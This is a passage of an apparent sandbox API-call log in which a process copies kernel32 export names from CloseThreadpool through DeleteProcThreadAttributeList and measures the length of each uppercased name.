(lpString="CLOSETHREADPOOL") returned 15 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.171] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.171] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.171] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.171] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.171] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.171] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.171] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.171] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.171] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.171] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.171] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.171] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.171] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.172] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.172] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.172] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.172] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.172] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.172] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.172] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.172] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.172] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.172] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.172] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.172] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.172] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.172] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.172] lstrlenA (lpString="COPYFILEA") returned 9 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.172] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.172] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.172] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.172] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.173] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.173] lstrlenA (lpString="COPYFILEW") returned 9 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.173] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.173] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.173] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.173] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.173] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.173] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.173] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.173] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.173] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.173] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.173] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.173] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.173] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.173] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.173] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.173] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.173] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.174] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.174] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.174] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.174] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.174] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.174] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.174] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.174] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.174] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.174] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.174] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.174] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.174] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.174] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.174] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.174] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.174] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.174] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.174] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.175] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.175] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.175] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.175] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.175] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.175] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.175] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.175] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.175] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.175] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.175] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.175] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.175] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.175] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.175] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.175] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.175] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.175] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.175] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.176] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.176] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.176] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.176] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.176] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.176] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.176] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.176] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.176] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.176] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.176] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.176] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.176] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.176] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.176] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.176] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.176] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.176] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.176] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.177] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.177] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.177] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.177] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.177] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.177] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.177] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.177] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.177] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.177] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.177] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.177] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.177] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.177] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.177] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.177] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.177] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.177] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.177] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.178] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.178] lstrlenA (lpString="DELETEATOM") returned 10 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.178] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.178] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.178] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.178] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.178] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.178] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.178] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.178] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.178] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.178] lstrcpyA 